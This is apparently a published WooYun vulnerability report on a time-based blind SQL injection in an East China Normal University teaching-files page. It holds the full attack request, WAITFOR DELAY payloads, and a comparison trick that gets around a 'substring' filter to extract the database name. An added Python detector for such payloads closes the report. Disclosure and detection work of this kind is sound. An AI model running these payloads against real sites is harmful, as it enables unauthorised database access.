
Vulnerability ID: wooyun-2015-0152530

Title: SQL injection at an East China Normal University site, filter can be bypassed

Vendor: East China Normal University

Author: 路人甲

Submitted: 2015-11-08 21:58

Fixed: 2015-12-25 08:24

Published: 2015-12-25 08:24

Type: SQL injection

Severity: High

Self-assessed rank: 15

Status: Confirmed by vendor

Source: http://www.wooyun.org; for questions or help, contact [email protected]



Vulnerability details

Disclosure timeline:

2015-11-08: Details sent to the vendor, awaiting vendor action
2015-11-10: Vendor confirmed; details visible to the vendor only
2015-11-20: Details opened to core white hats and domain experts
2015-11-30: Details opened to regular white hats
2015-12-10: Details opened to intern white hats
2015-12-25: Details opened to the public

Summary:

Details:

POST /Able.Acc2.Web/Page_TeachFiles.aspx HTTP/1.1
Content-Length: 3301
Content-Type: application/x-www-form-urlencoded
X-Requested-With: XMLHttpRequest
Referer: http://able.ecnu.edu.cn
Cookie: ASP.NET_SessionId=b3gfzw45bfnu2iqeagrhlq55; AbleAcc2Language=zh-CN
Host: able.ecnu.edu.cn
Connection: Keep-alive
Accept-Encoding: gzip,deflate
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.21 (KHTML, like Gecko) Chrome/41.0.2228.0 Safari/537.21
Accept: */*

ctl00%24ContentPlaceHolder1%24btnSearch=%e6%90%9c%e7%b4%a2&ctl00%24ContentPlaceHolder1%24acEndDate=01/01/1967&ctl00%24ContentPlaceHolder1%24acStartDate=01/01/1967&ctl00%24ContentPlaceHolder1%24txtfOrganizationName=iyevrtgt&ctl00%24ContentPlaceHolder1%24txtfTitle=r'if(len(db_name())=4) waitfor delay '0:0:5' -- &ctl00%24Home_Login1%24ImgBtnLogin=&ctl00%24Home_Login1%24txtCode=94102&ctl00%24Home_Login1%24txtLoginID=iyevrtgt&ctl00%24Home_Login1%24txtPassword=g00dPa%24%24w0rD&__EVENTARGUMENT=&__EVENTTARGET=&__EVENTVALIDATION=/wEWCALyjJjnDwKJicKUAwKC7pXpBwLb9ZTGDQL4naSuCwKN36n1DwKPupWbAgL3uvOGApdkC38vyINV8fHsP83bdFS35W44&__VIEWSTATE=[base64 view-state value omitted]

The ctl00%24ContentPlaceHolder1%24txtfTitle parameter is injectable:

r'if(len(db_name())=4) waitfor delay '0:0:5' --

The database name is 4 characters long:

[screenshot 11.png]

substring is filtered, so string comparison is used to extract the data:
# First character of the db name:

r'if(db_name()>'a') waitfor delay '0:0:5' --

Delay observed

[screenshot 31.png]

r'if(db_name()>'b') waitfor delay '0:0:5' --

No delay

[screenshot 32.png]

The first character of the db name is b.
Comparing character by character in this way recovers the whole db name.
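The lesson of the steps above is that blocking the keyword substring does nothing against a payload that never uses it. The following is an added example, not code from the report or from the affected site: a small Python scanner over constructed form bodies shaped like the request above (field names from the request, values constructed), showing that a keyword blacklist misses both payloads while a check for delay primitives and quote breakout flags them.

```python
import re
from urllib.parse import parse_qs

# Time-delay primitives used by time-based blind injection: MSSQL WAITFOR DELAY as in
# the report, plus the MySQL/PostgreSQL equivalents so the check generalises.
DELAY_RE = re.compile(r"waitfor\s+delay|\bsleep\s*\(|\bbenchmark\s*\(|\bpg_sleep\s*\(", re.I)
# A string-closing quote followed by a conditional and a trailing line comment:
# the shape of both payloads in the report (r'if(...) ... --).
BREAKOUT_RE = re.compile(r"'\s*(if|and|or)\b.*--", re.I)


def naive_substring_blacklist(value: str) -> bool:
    """The kind of filter the report describes: it blocks only the word 'substring'."""
    return "substring" in value.lower()


def looks_like_time_based_sqli(value: str) -> list[str]:
    """Return the indicators found in one decoded form value (empty list if none)."""
    reasons = []
    if DELAY_RE.search(value):
        reasons.append("delay-primitive")
    if BREAKOUT_RE.search(value):
        reasons.append("quote-breakout-with-comment")
    return reasons


def scan_form_body(body: str) -> dict[str, list[str]]:
    """Decode an x-www-form-urlencoded body and map flagged field names to indicators."""
    findings = {}
    for field, values in parse_qs(body, keep_blank_values=True).items():
        for value in values:
            reasons = looks_like_time_based_sqli(value)
            if reasons:
                findings[field] = reasons
    return findings


# Constructed sample bodies: the two probe variants from the report (without the
# view-state noise) and one benign search.
SAMPLE_BODIES = {
    "length-probe": "ctl00%24ContentPlaceHolder1%24txtfTitle=r'if(len(db_name())=4) waitfor delay '0:0:5' -- &ctl00%24ContentPlaceHolder1%24txtfOrganizationName=iyevrtgt",
    "compare-probe": "ctl00%24ContentPlaceHolder1%24txtfTitle=r'if(db_name()>'a') waitfor delay '0:0:5' -- &ctl00%24ContentPlaceHolder1%24txtfOrganizationName=iyevrtgt",
    "benign": "ctl00%24ContentPlaceHolder1%24txtfTitle=teaching+files+2015&ctl00%24ContentPlaceHolder1%24txtfOrganizationName=math",
}

if __name__ == "__main__":
    for name, body in SAMPLE_BODIES.items():
        print(name, scan_form_body(body))
```

The blacklist returns False for every sample, including both probes; the structural scan flags only the txtfTitle field of the two probes. The durable fix is a parameterised query, not a longer keyword list.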

Proof of vulnerability:

Fix recommendation:

Copyright notice: when reposting, please credit 路人甲@乌云


Vulnerability response

Vendor response:

Severity: High

Rank: 10

Confirmed: 2015-11-10 08:22

Vendor reply:

Notified the responsible subordinate unit to handle it.

Latest status:

None yet

